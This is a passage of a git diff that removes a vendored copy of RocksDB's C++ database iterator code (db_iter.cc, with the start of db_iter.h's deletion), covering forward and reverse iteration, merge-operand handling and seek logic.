-          case kTypeSingleDeletion:
-            // Arrange to skip all upcoming entries for this key since
-            // they are hidden by this deletion.
-            saved_key_.SetUserKey(
-                ikey.user_key,
-                !iter_->IsKeyPinned() || !pin_thru_lifetime_ /* copy */);
-            skipping = true;
-            PERF_COUNTER_ADD(internal_delete_skipped_count, 1);
-            break;
-          case kTypeValue:
-          case kTypeBlobIndex:
-            saved_key_.SetUserKey(
-                ikey.user_key,
-                !iter_->IsKeyPinned() || !pin_thru_lifetime_ /* copy */);
-            if (range_del_agg_.ShouldDelete(
-                    ikey, RangeDelAggregator::RangePositioningMode::
-                              kForwardTraversal)) {
-              // Arrange to skip all upcoming entries for this key since
-              // they are hidden by this deletion.
-              skipping = true;
-              num_skipped = 0;
-              PERF_COUNTER_ADD(internal_delete_skipped_count, 1);
-            } else if (ikey.type == kTypeBlobIndex) {
-              if (!allow_blob_) {
-                ROCKS_LOG_ERROR(logger_, "Encounter unexpected blob index.");
-                status_ = Status::NotSupported(
-                    "Encounter unexpected blob index. Please open DB with "
-                    "rocksdb::blob_db::BlobDB instead.");
-                valid_ = false;
-              } else {
-                is_blob_ = true;
-                valid_ = true;
-              }
-              return;
-            } else {
-              valid_ = true;
-              return;
-            }
-            break;
-          case kTypeMerge:
-            saved_key_.SetUserKey(
-                ikey.user_key,
-                !iter_->IsKeyPinned() || !pin_thru_lifetime_ /* copy */);
-            if (range_del_agg_.ShouldDelete(
-                    ikey, RangeDelAggregator::RangePositioningMode::
-                              kForwardTraversal)) {
-              // Arrange to skip all upcoming entries for this key since
-              // they are hidden by this deletion.
-              skipping = true;
-              num_skipped = 0;
-              PERF_COUNTER_ADD(internal_delete_skipped_count, 1);
-            } else {
-              // By now, we are sure the current ikey is going to yield a
-              // value
-              current_entry_is_merged_ = true;
-              valid_ = true;
-              MergeValuesNewToOld();  // Go to a different state machine
-              return;
-            }
-            break;
-          default:
-            assert(false);
-            break;
-        }
-      }
-    } else {
-      // This key was inserted after our snapshot was taken.
-      PERF_COUNTER_ADD(internal_recent_skipped_count, 1);
-
-      // Here saved_key_ may contain some old key, or the default empty key, or
-      // key assigned by some random other method. We don't care.
-      if (user_comparator_->Compare(ikey.user_key, saved_key_.GetUserKey()) <=
-          0) {
-        num_skipped++;
-      } else {
-        saved_key_.SetUserKey(
-            ikey.user_key,
-            !iter_->IsKeyPinned() || !pin_thru_lifetime_ /* copy */);
-        skipping = false;
-        num_skipped = 0;
-      }
-    }
-
-    // If we have sequentially iterated via numerous equal keys, then it's
-    // better to seek so that we can avoid too many key comparisons.
-    if (num_skipped > max_skip_) {
-      num_skipped = 0;
-      std::string last_key;
-      if (skipping) {
-        // We're looking for the next user-key but all we see are the same
-        // user-key with decreasing sequence numbers. Fast forward to
-        // sequence number 0 and type deletion (the smallest type).
-        AppendInternalKey(&last_key, ParsedInternalKey(saved_key_.GetUserKey(),
-                                                       0, kTypeDeletion));
-        // Don't set skipping = false because we may still see more user-keys
-        // equal to saved_key_.
-      } else {
-        // We saw multiple entries with this user key and sequence numbers
-        // higher than sequence_. Fast forward to sequence_.
-        // Note that this only covers a case when a higher key was overwritten
-        // many times since our snapshot was taken, not the case when a lot of
-        // different keys were inserted after our snapshot was taken.
-        AppendInternalKey(&last_key,
-                          ParsedInternalKey(saved_key_.GetUserKey(), sequence_,
-                                            kValueTypeForSeek));
-      }
-      iter_->Seek(last_key);
-      RecordTick(statistics_, NUMBER_OF_RESEEKS_IN_ITERATION);
-    } else {
-      iter_->Next();
-    }
-  } while (iter_->Valid());
-  valid_ = false;
-}
-
-// Merge values of the same user key starting from the current iter_ position
-// Scan from the newer entries to older entries.
-// PRE: iter_->key() points to the first merge type entry
-//      saved_key_ stores the user key
-// POST: saved_value_ has the merged value for the user key
-//       iter_ points to the next entry (or invalid)
-void DBIter::MergeValuesNewToOld() {
-  if (!merge_operator_) {
-    ROCKS_LOG_ERROR(logger_, "Options::merge_operator is null.");
-    status_ = Status::InvalidArgument("merge_operator_ must be set.");
-    valid_ = false;
-    return;
-  }
-
-  // Temporarily pin the blocks that hold merge operands
-  TempPinData();
-  merge_context_.Clear();
-  // Start the merge process by pushing the first operand
-  merge_context_.PushOperand(iter_->value(),
-                             iter_->IsValuePinned() /* operand_pinned */);
-
-  ParsedInternalKey ikey;
-  Status s;
-  for (iter_->Next(); iter_->Valid(); iter_->Next()) {
-    if (!ParseKey(&ikey)) {
-      // skip corrupted key
-      continue;
-    }
-
-    if (!user_comparator_->Equal(ikey.user_key, saved_key_.GetUserKey())) {
-      // hit the next user key, stop right here
-      break;
-    } else if (kTypeDeletion == ikey.type || kTypeSingleDeletion == ikey.type ||
-               range_del_agg_.ShouldDelete(
-                   ikey, RangeDelAggregator::RangePositioningMode::
-                             kForwardTraversal)) {
-      // hit a delete with the same user key, stop right here
-      // iter_ is positioned after delete
-      iter_->Next();
-      break;
-    } else if (kTypeValue == ikey.type) {
-      // hit a put, merge the put value with operands and store the
-      // final result in saved_value_. We are done!
-      // ignore corruption if there is any.
-      const Slice val = iter_->value();
-      s = MergeHelper::TimedFullMerge(
-          merge_operator_, ikey.user_key, &val, merge_context_.GetOperands(),
-          &saved_value_, logger_, statistics_, env_, &pinned_value_, true);
-      if (!s.ok()) {
-        status_ = s;
-      }
-      // iter_ is positioned after put
-      iter_->Next();
-      return;
-    } else if (kTypeMerge == ikey.type) {
-      // hit a merge, add the value as an operand and run associative merge.
-      // when complete, add result to operands and continue.
-      merge_context_.PushOperand(iter_->value(),
-                                 iter_->IsValuePinned() /* operand_pinned */);
-      PERF_COUNTER_ADD(internal_merge_count, 1);
-    } else if (kTypeBlobIndex == ikey.type) {
-      if (!allow_blob_) {
-        ROCKS_LOG_ERROR(logger_, "Encounter unexpected blob index.");
-        status_ = Status::NotSupported(
-            "Encounter unexpected blob index. Please open DB with "
-            "rocksdb::blob_db::BlobDB instead.");
-      } else {
-        status_ =
-            Status::NotSupported("Blob DB does not support merge operator.");
-      }
-      valid_ = false;
-      return;
-    } else {
-      assert(false);
-    }
-  }
-
-  // we either exhausted all internal keys under this user key, or hit
-  // a deletion marker.
-  // feed null as the existing value to the merge operator, such that
-  // client can differentiate this scenario and do things accordingly.
-  s = MergeHelper::TimedFullMerge(merge_operator_, saved_key_.GetUserKey(),
-                                  nullptr, merge_context_.GetOperands(),
-                                  &saved_value_, logger_, statistics_, env_,
-                                  &pinned_value_, true);
-  if (!s.ok()) {
-    status_ = s;
-  }
-}
-
-void DBIter::Prev() {
-  assert(valid_);
-  ReleaseTempPinnedData();
-  ResetInternalKeysSkippedCounter();
-  if (direction_ == kForward) {
-    ReverseToBackward();
-  }
-  PrevInternal();
-  if (statistics_ != nullptr) {
-    local_stats_.prev_count_++;
-    if (valid_) {
-      local_stats_.prev_found_count_++;
-      local_stats_.bytes_read_ += (key().size() + value().size());
-    }
-  }
-}
-
-void DBIter::ReverseToForward() {
-  if (prefix_extractor_ != nullptr && !total_order_seek_) {
-    IterKey last_key;
-    last_key.SetInternalKey(ParsedInternalKey(
-        saved_key_.GetUserKey(), kMaxSequenceNumber, kValueTypeForSeek));
-    iter_->Seek(last_key.GetInternalKey());
-  }
-  FindNextUserKey();
-  direction_ = kForward;
-  if (!iter_->Valid()) {
-    iter_->SeekToFirst();
-    range_del_agg_.InvalidateTombstoneMapPositions();
-  }
-}
-
-void DBIter::ReverseToBackward() {
-  if (prefix_extractor_ != nullptr && !total_order_seek_) {
-    IterKey last_key;
-    last_key.SetInternalKey(ParsedInternalKey(saved_key_.GetUserKey(), 0,
-                                              kValueTypeForSeekForPrev));
-    iter_->SeekForPrev(last_key.GetInternalKey());
-  }
-  if (current_entry_is_merged_) {
-    // Not placed in the same key. Need to call Prev() until finding the
-    // previous key.
-    if (!iter_->Valid()) {
-      iter_->SeekToLast();
-      range_del_agg_.InvalidateTombstoneMapPositions();
-    }
-    ParsedInternalKey ikey;
-    FindParseableKey(&ikey, kReverse);
-    while (iter_->Valid() &&
-           user_comparator_->Compare(ikey.user_key, saved_key_.GetUserKey()) >
-               0) {
-      assert(ikey.sequence != kMaxSequenceNumber);
-      if (ikey.sequence > sequence_) {
-        PERF_COUNTER_ADD(internal_recent_skipped_count, 1);
-      } else {
-        PERF_COUNTER_ADD(internal_key_skipped_count, 1);
-      }
-      iter_->Prev();
-      FindParseableKey(&ikey, kReverse);
-    }
-  }
-#ifndef NDEBUG
-  if (iter_->Valid()) {
-    ParsedInternalKey ikey;
-    assert(ParseKey(&ikey));
-    assert(user_comparator_->Compare(ikey.user_key, saved_key_.GetUserKey()) <=
-           0);
-  }
-#endif
-
-  FindPrevUserKey();
-  direction_ = kReverse;
-}
-
-void DBIter::PrevInternal() {
-  if (!iter_->Valid()) {
-    valid_ = false;
-    return;
-  }
-
-  ParsedInternalKey ikey;
-
-  while (iter_->Valid()) {
-    saved_key_.SetUserKey(
-        ExtractUserKey(iter_->key()),
-        !iter_->IsKeyPinned() || !pin_thru_lifetime_ /* copy */);
-
-    if (FindValueForCurrentKey()) {
-      if (!iter_->Valid()) {
-        return;
-      }
-      FindParseableKey(&ikey, kReverse);
-      if (user_comparator_->Equal(ikey.user_key, saved_key_.GetUserKey())) {
-        FindPrevUserKey();
-      }
-      if (valid_ && prefix_extractor_ && prefix_same_as_start_ &&
-          prefix_extractor_->Transform(saved_key_.GetUserKey())
-                  .compare(prefix_start_key_) != 0) {
-        valid_ = false;
-      }
-      return;
-    }
-
-    if (TooManyInternalKeysSkipped(false)) {
-      return;
-    }
-
-    if (!iter_->Valid()) {
-      break;
-    }
-    FindParseableKey(&ikey, kReverse);
-    if (user_comparator_->Equal(ikey.user_key, saved_key_.GetUserKey())) {
-      FindPrevUserKey();
-    }
-  }
-  // We haven't found any key - iterator is not valid
-  // Or the prefix is different than start prefix
-  assert(!iter_->Valid());
-  valid_ = false;
-}
-
-// This function checks, if the entry with biggest sequence_number <= sequence_
-// is non kTypeDeletion or kTypeSingleDeletion. If it's not, we save value in
-// saved_value_
-bool DBIter::FindValueForCurrentKey() {
-  assert(iter_->Valid());
-  merge_context_.Clear();
-  current_entry_is_merged_ = false;
-  // last entry before merge (could be kTypeDeletion, kTypeSingleDeletion or
-  // kTypeValue)
-  ValueType last_not_merge_type = kTypeDeletion;
-  ValueType last_key_entry_type = kTypeDeletion;
-
-  ParsedInternalKey ikey;
-  FindParseableKey(&ikey, kReverse);
-
-  // Temporarily pin blocks that hold (merge operands / the value)
-  ReleaseTempPinnedData();
-  TempPinData();
-  size_t num_skipped = 0;
-  while (iter_->Valid() && ikey.sequence <= sequence_ &&
-         user_comparator_->Equal(ikey.user_key, saved_key_.GetUserKey())) {
-    if (TooManyInternalKeysSkipped()) {
-      return false;
-    }
-
-    // We iterate too much: let's use Seek() to avoid too much key comparisons
-    if (num_skipped >= max_skip_) {
-      return FindValueForCurrentKeyUsingSeek();
-    }
-
-    last_key_entry_type = ikey.type;
-    switch (last_key_entry_type) {
-      case kTypeValue:
-      case kTypeBlobIndex:
-        if (range_del_agg_.ShouldDelete(
-                ikey,
-                RangeDelAggregator::RangePositioningMode::kBackwardTraversal)) {
-          last_key_entry_type = kTypeRangeDeletion;
-          PERF_COUNTER_ADD(internal_delete_skipped_count, 1);
-        } else {
-          assert(iter_->IsValuePinned());
-          pinned_value_ = iter_->value();
-        }
-        merge_context_.Clear();
-        last_not_merge_type = last_key_entry_type;
-        break;
-      case kTypeDeletion:
-      case kTypeSingleDeletion:
-        merge_context_.Clear();
-        last_not_merge_type = last_key_entry_type;
-        PERF_COUNTER_ADD(internal_delete_skipped_count, 1);
-        break;
-      case kTypeMerge:
-        if (range_del_agg_.ShouldDelete(
-                ikey,
-                RangeDelAggregator::RangePositioningMode::kBackwardTraversal)) {
-          merge_context_.Clear();
-          last_key_entry_type = kTypeRangeDeletion;
-          last_not_merge_type = last_key_entry_type;
-          PERF_COUNTER_ADD(internal_delete_skipped_count, 1);
-        } else {
-          assert(merge_operator_ != nullptr);
-          merge_context_.PushOperandBack(
-              iter_->value(), iter_->IsValuePinned() /* operand_pinned */);
-          PERF_COUNTER_ADD(internal_merge_count, 1);
-        }
-        break;
-      default:
-        assert(false);
-    }
-
-    PERF_COUNTER_ADD(internal_key_skipped_count, 1);
-    assert(user_comparator_->Equal(ikey.user_key, saved_key_.GetUserKey()));
-    iter_->Prev();
-    ++num_skipped;
-    FindParseableKey(&ikey, kReverse);
-  }
-
-  Status s;
-  is_blob_ = false;
-  switch (last_key_entry_type) {
-    case kTypeDeletion:
-    case kTypeSingleDeletion:
-    case kTypeRangeDeletion:
-      valid_ = false;
-      return false;
-    case kTypeMerge:
-      current_entry_is_merged_ = true;
-      if (last_not_merge_type == kTypeDeletion ||
-          last_not_merge_type == kTypeSingleDeletion ||
-          last_not_merge_type == kTypeRangeDeletion) {
-        s = MergeHelper::TimedFullMerge(
-            merge_operator_, saved_key_.GetUserKey(), nullptr,
-            merge_context_.GetOperands(), &saved_value_, logger_, statistics_,
-            env_, &pinned_value_, true);
-      } else if (last_not_merge_type == kTypeBlobIndex) {
-        if (!allow_blob_) {
-          ROCKS_LOG_ERROR(logger_, "Encounter unexpected blob index.");
-          status_ = Status::NotSupported(
-              "Encounter unexpected blob index. Please open DB with "
-              "rocksdb::blob_db::BlobDB instead.");
-        } else {
-          status_ =
-              Status::NotSupported("Blob DB does not support merge operator.");
-        }
-        valid_ = false;
-        return true;
-      } else {
-        assert(last_not_merge_type == kTypeValue);
-        s = MergeHelper::TimedFullMerge(
-            merge_operator_, saved_key_.GetUserKey(), &pinned_value_,
-            merge_context_.GetOperands(), &saved_value_, logger_, statistics_,
-            env_, &pinned_value_, true);
-      }
-      break;
-    case kTypeValue:
-      // do nothing - we've already has value in saved_value_
-      break;
-    case kTypeBlobIndex:
-      if (!allow_blob_) {
-        ROCKS_LOG_ERROR(logger_, "Encounter unexpected blob index.");
-        status_ = Status::NotSupported(
-            "Encounter unexpected blob index. Please open DB with "
-            "rocksdb::blob_db::BlobDB instead.");
-        valid_ = false;
-        return true;
-      }
-      is_blob_ = true;
-      break;
-    default:
-      assert(false);
-      break;
-  }
-  valid_ = true;
-  if (!s.ok()) {
-    status_ = s;
-  }
-  return true;
-}
-
-// This function is used in FindValueForCurrentKey.
-// We use Seek() function instead of Prev() to find necessary value
-bool DBIter::FindValueForCurrentKeyUsingSeek() {
-  // FindValueForCurrentKey will enable pinning before calling
-  // FindValueForCurrentKeyUsingSeek()
-  assert(pinned_iters_mgr_.PinningEnabled());
-  std::string last_key;
-  AppendInternalKey(&last_key, ParsedInternalKey(saved_key_.GetUserKey(),
-                                                 sequence_, kValueTypeForSeek));
-  iter_->Seek(last_key);
-  RecordTick(statistics_, NUMBER_OF_RESEEKS_IN_ITERATION);
-
-  // assume there is at least one parseable key for this user key
-  ParsedInternalKey ikey;
-  FindParseableKey(&ikey, kForward);
-
-  if (ikey.type == kTypeDeletion || ikey.type == kTypeSingleDeletion ||
-      range_del_agg_.ShouldDelete(
-          ikey, RangeDelAggregator::RangePositioningMode::kBackwardTraversal)) {
-    valid_ = false;
-    return false;
-  }
-  if (ikey.type == kTypeBlobIndex && !allow_blob_) {
-    ROCKS_LOG_ERROR(logger_, "Encounter unexpected blob index.");
-    status_ = Status::NotSupported(
-        "Encounter unexpected blob index. Please open DB with "
-        "rocksdb::blob_db::BlobDB instead.");
-    valid_ = false;
-    return true;
-  }
-  if (ikey.type == kTypeValue || ikey.type == kTypeBlobIndex) {
-    assert(iter_->IsValuePinned());
-    pinned_value_ = iter_->value();
-    valid_ = true;
-    return true;
-  }
-
-  // kTypeMerge. We need to collect all kTypeMerge values and save them
-  // in operands
-  current_entry_is_merged_ = true;
-  merge_context_.Clear();
-  while (
-      iter_->Valid() &&
-      user_comparator_->Equal(ikey.user_key, saved_key_.GetUserKey()) &&
-      ikey.type == kTypeMerge &&
-      !range_del_agg_.ShouldDelete(
-          ikey, RangeDelAggregator::RangePositioningMode::kBackwardTraversal)) {
-    merge_context_.PushOperand(iter_->value(),
-                               iter_->IsValuePinned() /* operand_pinned */);
-    PERF_COUNTER_ADD(internal_merge_count, 1);
-    iter_->Next();
-    FindParseableKey(&ikey, kForward);
-  }
-
-  Status s;
-  if (!iter_->Valid() ||
-      !user_comparator_->Equal(ikey.user_key, saved_key_.GetUserKey()) ||
-      ikey.type == kTypeDeletion || ikey.type == kTypeSingleDeletion ||
-      range_del_agg_.ShouldDelete(
-          ikey, RangeDelAggregator::RangePositioningMode::kBackwardTraversal)) {
-    s = MergeHelper::TimedFullMerge(merge_operator_, saved_key_.GetUserKey(),
-                                    nullptr, merge_context_.GetOperands(),
-                                    &saved_value_, logger_, statistics_, env_,
-                                    &pinned_value_, true);
-    // Make iter_ valid and point to saved_key_
-    if (!iter_->Valid() ||
-        !user_comparator_->Equal(ikey.user_key, saved_key_.GetUserKey())) {
-      iter_->Seek(last_key);
-      RecordTick(statistics_, NUMBER_OF_RESEEKS_IN_ITERATION);
-    }
-    valid_ = true;
-    if (!s.ok()) {
-      status_ = s;
-    }
-    return true;
-  }
-
-  const Slice& val = iter_->value();
-  s = MergeHelper::TimedFullMerge(merge_operator_, saved_key_.GetUserKey(),
-                                  &val, merge_context_.GetOperands(),
-                                  &saved_value_, logger_, statistics_, env_,
-                                  &pinned_value_, true);
-  valid_ = true;
-  if (!s.ok()) {
-    status_ = s;
-  }
-  return true;
-}
-
-// Used in Next to change directions
-// Go to next user key
-// Don't use Seek(),
-// because next user key will be very close
-void DBIter::FindNextUserKey() {
-  if (!iter_->Valid()) {
-    return;
-  }
-  ParsedInternalKey ikey;
-  FindParseableKey(&ikey, kForward);
-  while (iter_->Valid() &&
-         !user_comparator_->Equal(ikey.user_key, saved_key_.GetUserKey())) {
-    iter_->Next();
-    FindParseableKey(&ikey, kForward);
-  }
-}
-
-// Go to previous user_key
-void DBIter::FindPrevUserKey() {
-  if (!iter_->Valid()) {
-    return;
-  }
-  size_t num_skipped = 0;
-  ParsedInternalKey ikey;
-  FindParseableKey(&ikey, kReverse);
-  int cmp;
-  while (iter_->Valid() &&
-         ((cmp = user_comparator_->Compare(ikey.user_key,
-                                           saved_key_.GetUserKey())) == 0 ||
-          (cmp > 0 && ikey.sequence > sequence_))) {
-    if (TooManyInternalKeysSkipped()) {
-      return;
-    }
-
-    if (cmp == 0) {
-      if (num_skipped >= max_skip_) {
-        num_skipped = 0;
-        IterKey last_key;
-        last_key.SetInternalKey(ParsedInternalKey(
-            saved_key_.GetUserKey(), kMaxSequenceNumber, kValueTypeForSeek));
-        iter_->Seek(last_key.GetInternalKey());
-        RecordTick(statistics_, NUMBER_OF_RESEEKS_IN_ITERATION);
-      } else {
-        ++num_skipped;
-      }
-    }
-    assert(ikey.sequence != kMaxSequenceNumber);
-    if (ikey.sequence > sequence_) {
-      PERF_COUNTER_ADD(internal_recent_skipped_count, 1);
-    } else {
-      PERF_COUNTER_ADD(internal_key_skipped_count, 1);
-    }
-    iter_->Prev();
-    FindParseableKey(&ikey, kReverse);
-  }
-}
-
-bool DBIter::TooManyInternalKeysSkipped(bool increment) {
-  if ((max_skippable_internal_keys_ > 0) &&
-      (num_internal_keys_skipped_ > max_skippable_internal_keys_)) {
-    valid_ = false;
-    status_ = Status::Incomplete("Too many internal keys skipped.");
-    return true;
-  } else if (increment) {
-    num_internal_keys_skipped_++;
-  }
-  return false;
-}
-
-// Skip all unparseable keys
-void DBIter::FindParseableKey(ParsedInternalKey* ikey, Direction direction) {
-  while (iter_->Valid() && !ParseKey(ikey)) {
-    if (direction == kReverse) {
-      iter_->Prev();
-    } else {
-      iter_->Next();
-    }
-  }
-}
-
-void DBIter::Seek(const Slice& target) {
-  StopWatch sw(env_, statistics_, DB_SEEK);
-  ReleaseTempPinnedData();
-  ResetInternalKeysSkippedCounter();
-  saved_key_.Clear();
-  saved_key_.SetInternalKey(target, sequence_);
-
-  {
-    PERF_TIMER_GUARD(seek_internal_seek_time);
-    iter_->Seek(saved_key_.GetInternalKey());
-    range_del_agg_.InvalidateTombstoneMapPositions();
-  }
-  RecordTick(statistics_, NUMBER_DB_SEEK);
-  if (iter_->Valid()) {
-    if (prefix_extractor_ && prefix_same_as_start_) {
-      prefix_start_key_ = prefix_extractor_->Transform(target);
-    }
-    direction_ = kForward;
-    ClearSavedValue();
-    FindNextUserEntry(false /* not skipping */, prefix_same_as_start_);
-    if (!valid_) {
-      prefix_start_key_.clear();
-    }
-    if (statistics_ != nullptr) {
-      if (valid_) {
-        RecordTick(statistics_, NUMBER_DB_SEEK_FOUND);
-        RecordTick(statistics_, ITER_BYTES_READ, key().size() + value().size());
-        PERF_COUNTER_ADD(iter_read_bytes, key().size() + value().size());
-      }
-    }
-  } else {
-    valid_ = false;
-  }
-
-  if (valid_ && prefix_extractor_ && prefix_same_as_start_) {
-    prefix_start_buf_.SetUserKey(prefix_start_key_);
-    prefix_start_key_ = prefix_start_buf_.GetUserKey();
-  }
-}
-
-void DBIter::SeekForPrev(const Slice& target) {
-  StopWatch sw(env_, statistics_, DB_SEEK);
-  ReleaseTempPinnedData();
-  ResetInternalKeysSkippedCounter();
-  saved_key_.Clear();
-  // now saved_key is used to store internal key.
-  saved_key_.SetInternalKey(target, 0 /* sequence_number */,
-                            kValueTypeForSeekForPrev);
-
-  {
-    PERF_TIMER_GUARD(seek_internal_seek_time);
-    iter_->SeekForPrev(saved_key_.GetInternalKey());
-    range_del_agg_.InvalidateTombstoneMapPositions();
-  }
-
-  RecordTick(statistics_, NUMBER_DB_SEEK);
-  if (iter_->Valid()) {
-    if (prefix_extractor_ && prefix_same_as_start_) {
-      prefix_start_key_ = prefix_extractor_->Transform(target);
-    }
-    direction_ = kReverse;
-    ClearSavedValue();
-    PrevInternal();
-    if (!valid_) {
-      prefix_start_key_.clear();
-    }
-    if (statistics_ != nullptr) {
-      if (valid_) {
-        RecordTick(statistics_, NUMBER_DB_SEEK_FOUND);
-        RecordTick(statistics_, ITER_BYTES_READ, key().size() + value().size());
-        PERF_COUNTER_ADD(iter_read_bytes, key().size() + value().size());
-      }
-    }
-  } else {
-    valid_ = false;
-  }
-  if (valid_ && prefix_extractor_ && prefix_same_as_start_) {
-    prefix_start_buf_.SetUserKey(prefix_start_key_);
-    prefix_start_key_ = prefix_start_buf_.GetUserKey();
-  }
-}
-
-void DBIter::SeekToFirst() {
-  // Don't use iter_::Seek() if we set a prefix extractor
-  // because prefix seek will be used.
-  if (prefix_extractor_ != nullptr) {
-    max_skip_ = std::numeric_limits<uint64_t>::max();
-  }
-  direction_ = kForward;
-  ReleaseTempPinnedData();
-  ResetInternalKeysSkippedCounter();
-  ClearSavedValue();
-
-  {
-    PERF_TIMER_GUARD(seek_internal_seek_time);
-    iter_->SeekToFirst();
-    range_del_agg_.InvalidateTombstoneMapPositions();
-  }
-
-  RecordTick(statistics_, NUMBER_DB_SEEK);
-  if (iter_->Valid()) {
-    saved_key_.SetUserKey(
-        ExtractUserKey(iter_->key()),
-        !iter_->IsKeyPinned() || !pin_thru_lifetime_ /* copy */);
-    FindNextUserEntry(false /* not skipping */, false /* no prefix check */);
-    if (statistics_ != nullptr) {
-      if (valid_) {
-        RecordTick(statistics_, NUMBER_DB_SEEK_FOUND);
-        RecordTick(statistics_, ITER_BYTES_READ, key().size() + value().size());
-        PERF_COUNTER_ADD(iter_read_bytes, key().size() + value().size());
-      }
-    }
-  } else {
-    valid_ = false;
-  }
-  if (valid_ && prefix_extractor_ && prefix_same_as_start_) {
-    prefix_start_buf_.SetUserKey(
-        prefix_extractor_->Transform(saved_key_.GetUserKey()));
-    prefix_start_key_ = prefix_start_buf_.GetUserKey();
-  }
-}
-
-void DBIter::SeekToLast() {
-  // Don't use iter_::Seek() if we set a prefix extractor
-  // because prefix seek will be used.
-  if (prefix_extractor_ != nullptr) {
-    max_skip_ = std::numeric_limits<uint64_t>::max();
-  }
-  direction_ = kReverse;
-  ReleaseTempPinnedData();
-  ResetInternalKeysSkippedCounter();
-  ClearSavedValue();
-
-  {
-    PERF_TIMER_GUARD(seek_internal_seek_time);
-    iter_->SeekToLast();
-    range_del_agg_.InvalidateTombstoneMapPositions();
-  }
-  // When the iterate_upper_bound is set to a value,
-  // it will seek to the last key before the
-  // ReadOptions.iterate_upper_bound
-  if (iter_->Valid() && iterate_upper_bound_ != nullptr) {
-    SeekForPrev(*iterate_upper_bound_);
-    range_del_agg_.InvalidateTombstoneMapPositions();
-    if (!Valid()) {
-      return;
-    } else if (user_comparator_->Equal(*iterate_upper_bound_, key())) {
-      Prev();
-    }
-  } else {
-    PrevInternal();
-  }
-  if (statistics_ != nullptr) {
-    RecordTick(statistics_, NUMBER_DB_SEEK);
-    if (valid_) {
-      RecordTick(statistics_, NUMBER_DB_SEEK_FOUND);
-      RecordTick(statistics_, ITER_BYTES_READ, key().size() + value().size());
-      PERF_COUNTER_ADD(iter_read_bytes, key().size() + value().size());
-    }
-  }
-  if (valid_ && prefix_extractor_ && prefix_same_as_start_) {
-    prefix_start_buf_.SetUserKey(
-        prefix_extractor_->Transform(saved_key_.GetUserKey()));
-    prefix_start_key_ = prefix_start_buf_.GetUserKey();
-  }
-}
-
-Iterator* NewDBIterator(Env* env, const ReadOptions& read_options,
-                        const ImmutableCFOptions& cf_options,
-                        const Comparator* user_key_comparator,
-                        InternalIterator* internal_iter,
-                        const SequenceNumber& sequence,
-                        uint64_t max_sequential_skip_in_iterations,
-                        bool allow_blob) {
-  DBIter* db_iter = new DBIter(
-      env, read_options, cf_options, user_key_comparator, internal_iter,
-      sequence, false, max_sequential_skip_in_iterations, allow_blob);
-  return db_iter;
-}
-
-ArenaWrappedDBIter::~ArenaWrappedDBIter() { db_iter_->~DBIter(); }
-
-RangeDelAggregator* ArenaWrappedDBIter::GetRangeDelAggregator() {
-  return db_iter_->GetRangeDelAggregator();
-}
-
-void ArenaWrappedDBIter::SetIterUnderDBIter(InternalIterator* iter) {
-  static_cast<DBIter*>(db_iter_)->SetIter(iter);
-}
-
-inline bool ArenaWrappedDBIter::Valid() const { return db_iter_->Valid(); }
-inline void ArenaWrappedDBIter::SeekToFirst() { db_iter_->SeekToFirst(); }
-inline void ArenaWrappedDBIter::SeekToLast() { db_iter_->SeekToLast(); }
-inline void ArenaWrappedDBIter::Seek(const Slice& target) {
-  db_iter_->Seek(target);
-}
-inline void ArenaWrappedDBIter::SeekForPrev(const Slice& target) {
-  db_iter_->SeekForPrev(target);
-}
-inline void ArenaWrappedDBIter::Next() { db_iter_->Next(); }
-inline void ArenaWrappedDBIter::Prev() { db_iter_->Prev(); }
-inline Slice ArenaWrappedDBIter::key() const { return db_iter_->key(); }
-inline Slice ArenaWrappedDBIter::value() const { return db_iter_->value(); }
-inline Status ArenaWrappedDBIter::status() const { return db_iter_->status(); }
-bool ArenaWrappedDBIter::IsBlob() const { return db_iter_->IsBlob(); }
-inline Status ArenaWrappedDBIter::GetProperty(std::string prop_name,
-                                              std::string* prop) {
-  if (prop_name == "rocksdb.iterator.super-version-number") {
-    // First try to pass the value returned from inner iterator.
-    if (!db_iter_->GetProperty(prop_name, prop).ok()) {
-      *prop = ToString(sv_number_);
-    }
-    return Status::OK();
-  }
-  return db_iter_->GetProperty(prop_name, prop);
-}
-
-void ArenaWrappedDBIter::Init(Env* env, const ReadOptions& read_options,
-                              const ImmutableCFOptions& cf_options,
-                              const SequenceNumber& sequence,
-                              uint64_t max_sequential_skip_in_iteration,
-                              uint64_t version_number, bool allow_blob) {
-  auto mem = arena_.AllocateAligned(sizeof(DBIter));
-  db_iter_ = new (mem)
-      DBIter(env, read_options, cf_options, cf_options.user_comparator, nullptr,
-             sequence, true, max_sequential_skip_in_iteration, allow_blob);
-  sv_number_ = version_number;
-}
-
-Status ArenaWrappedDBIter::Refresh() {
-  if (cfd_ == nullptr || db_impl_ == nullptr) {
-    return Status::NotSupported("Creating renew iterator is not allowed.");
-  }
-  assert(db_iter_ != nullptr);
-  SequenceNumber latest_seq = db_impl_->GetLatestSequenceNumber();
-  uint64_t cur_sv_number = cfd_->GetSuperVersionNumber();
-  if (sv_number_ != cur_sv_number) {
-    Env* env = db_iter_->env();
-    db_iter_->~DBIter();
-    arena_.~Arena();
-    new (&arena_) Arena();
-
-    SuperVersion* sv = cfd_->GetReferencedSuperVersion(db_impl_->mutex());
-    Init(env, read_options_, *(cfd_->ioptions()), latest_seq,
-         sv->mutable_cf_options.max_sequential_skip_in_iterations,
-         cur_sv_number, allow_blob_);
-
-    InternalIterator* internal_iter = db_impl_->NewInternalIterator(
-        read_options_, cfd_, sv, &arena_, db_iter_->GetRangeDelAggregator());
-    SetIterUnderDBIter(internal_iter);
-  } else {
-    db_iter_->set_sequence(latest_seq);
-    db_iter_->set_valid(false);
-  }
-  return Status::OK();
-}
-
-ArenaWrappedDBIter* NewArenaWrappedDbIterator(
-    Env* env, const ReadOptions& read_options,
-    const ImmutableCFOptions& cf_options, const SequenceNumber& sequence,
-    uint64_t max_sequential_skip_in_iterations, uint64_t version_number,
-    DBImpl* db_impl, ColumnFamilyData* cfd, bool allow_blob) {
-  ArenaWrappedDBIter* iter = new ArenaWrappedDBIter();
-  iter->Init(env, read_options, cf_options, sequence,
-             max_sequential_skip_in_iterations, version_number, allow_blob);
-  if (db_impl != nullptr && cfd != nullptr) {
-    iter->StoreRefreshInfo(read_options, db_impl, cfd, allow_blob);
-  }
-
-  return iter;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/db_iter.h b/thirdparty/rocksdb/db/db_iter.h
deleted file mode 100644
index 26fcd44..0000000
--- a/thirdparty/rocksdb/db/db_iter.h
+++ /dev/null
@@ -1,105 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
